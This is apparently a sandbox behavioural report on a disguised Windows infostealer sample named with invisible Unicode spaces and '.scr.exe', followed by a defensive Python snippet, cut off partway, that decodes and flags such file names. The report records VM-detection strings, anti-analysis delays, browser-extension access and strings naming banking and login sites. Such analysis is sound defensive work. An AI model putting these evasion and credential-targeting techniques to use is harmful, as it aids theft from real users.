Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\select.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dll
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe API coverage: 4.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5276 Thread sleep count: 4083 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5304 Thread sleep count: 3541 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4352 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5292 Thread sleep count: 3324 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436 Thread sleep count: 848 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep count: 3837 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep count: 825 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888 Thread sleep count: 4659 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916 Thread sleep count: 304 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep count: 3229 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440 Thread sleep count: 152 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676 Thread sleep count: 2760 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820 Thread sleep count: 998 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE188D0 FindFirstFileExW,FindClose, 0_2_00007FF73AE188D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE31EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF73AE31EE4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EA46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 68_2_00007FF7F7EA46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EE88E0 FindFirstFileExA, 68_2_00007FF7F7EE88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E9E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 68_2_00007FF7F7E9E21C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A86F1490 GetSystemInfo, 2_2_00007FF8A86F1490
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af\
Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: g#jdfecodevmware
Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc
Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW!
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"h
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: d2qemu-ga
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWncel%SystemRoot%\system32\mswsock.dlltative host not found.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmware)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareservice
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser
Source: getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: f8vmusrvc
Source: getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-VT
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2150926613.0000028C88DAD000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322447495.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163848479.0000028C87C28000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163106879.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2153913048.0000028C88B6D000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323961811.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fecodevmsrvc
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DEC1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151715495.0000020D5DEBE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DEC1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151715495.0000020D5DEBE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicera
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE2ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF73AE2ABD8
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A86A7B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 2_2_00007FF8A86A7B30
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE33AF0 GetProcessHeap, 0_2_00007FF73AE33AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE2ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF73AE2ABD8
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE1BCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF73AE1BCE0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE1C760 SetUnhandledExceptionFilter, 0_2_00007FF73AE1C760
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE1C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF73AE1C57C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8093068 IsProcessorFeaturePresent,00007FF8BA251730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BA251730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF8A8093068
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EDB6D8 SetUnhandledExceptionFilter, 68_2_00007FF7F7EDB6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EDA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 68_2_00007FF7F7EDA66C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EDB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 68_2_00007FF7F7EDB52C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EE4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 68_2_00007FF7F7EE4C10
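Every Source path above carries the sample's file name in the sandbox's #Uxxxx rendering. Decoding it shows what the "obfuscated file name" signature is reacting to: the name is four Unicode space characters (U+202F, U+202F, U+2005, U+00A0) followed by .scr.exe, so in Explorer with extensions hidden it appears as a nameless screensaver. The Python below is added as a worked check and is not part of the report or of the sample; it decodes the escapes, lists every space-separator or format character in the name (U+202E RIGHT-TO-LEFT OVERRIDE belongs to the latter class, which is why the same check covers the RTLO trick the signature family is named after) and recovers the real extension. The clean name and the RTLO name used in the test are constructed.

```python
import re
import unicodedata

# Joe Sandbox renders code points it cannot print as "#Uxxxx" escapes; the
# sample analysed here appears as "#U202f#U202f#U2005#U00a0.scr.exe".
ESCAPE_RE = re.compile(r"#U([0-9A-Fa-f]{4})")
RTLO = "\u202e"                      # RIGHT-TO-LEFT OVERRIDE
# Zs: space separators other than U+0020 (invisible padding in front of the
# real extension); Cf: format characters (bidi overrides, zero-width spaces).
SUSPICIOUS_CATEGORIES = {"Zs", "Cf"}

SAMPLE_NAME = "#U202f#U202f#U2005#U00a0.scr.exe"   # from the report above


def decode_sandbox_name(name):
    """Turn #Uxxxx escapes back into the characters they stand for; other names pass through."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), name)


def inspect_filename(name):
    """Flag invisible or direction-changing characters and recover what the name really is."""
    real = decode_sandbox_name(name)
    flagged = [
        {"index": i, "codepoint": f"U+{ord(ch):04X}",
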